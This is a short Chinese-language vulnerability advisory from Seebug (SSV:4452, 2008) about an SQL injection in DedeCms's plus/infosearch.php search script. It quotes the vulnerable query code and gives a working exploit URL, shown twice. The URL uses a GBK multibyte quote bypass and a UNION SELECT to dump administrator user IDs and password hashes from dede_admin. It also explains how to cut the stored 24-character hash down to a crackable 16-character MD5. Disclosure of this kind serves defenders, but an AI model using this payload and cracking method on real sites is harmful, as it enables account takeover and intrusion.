织梦(DedeCms)plus/infosearch.php 文件注入漏洞

2008-11-15T00:00:00
ID SSV:4452
Type seebug
Reporter Root
Modified 2008-11-15T00:00:00

Description

/plus/infosearch.php $q = trim($q);

if($areaid > 0) {

$wheresql = "areaid=$areaid and ";

              }

$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";

获得变量q,直接放入数据库查询.导致注入产生,这样一个搜索型的注入,本身对于php环境如果设置了magic_quote_gpc=on的话,利用起来是很难的.但是可以结合php多字节编码漏洞,这样,一个相对来说不错的利用方式产生了.可以如下构造,通过get方式提交. 利用地址:

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

补充:dedecms暴出来的管理员密码只有24位,这里我简单的来说一下,dedecms首先获得某密码的32位MD5加密值,然后去掉后面8位,这样,拿剩下的24位来做为密码的加密值.这里我们可以想到,32位转16位可以把32位的前8位和后8位去掉,剩下的中间就是其16位的加密值,于是,我们可以把dedecms中暴出来的那窜24位加密值的前8位去掉,剩下的16位就可以拿去破解了.

dedecms GBK 5.1 下载安装dedecms5.1 SP1

                                        
                                            
                                                http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*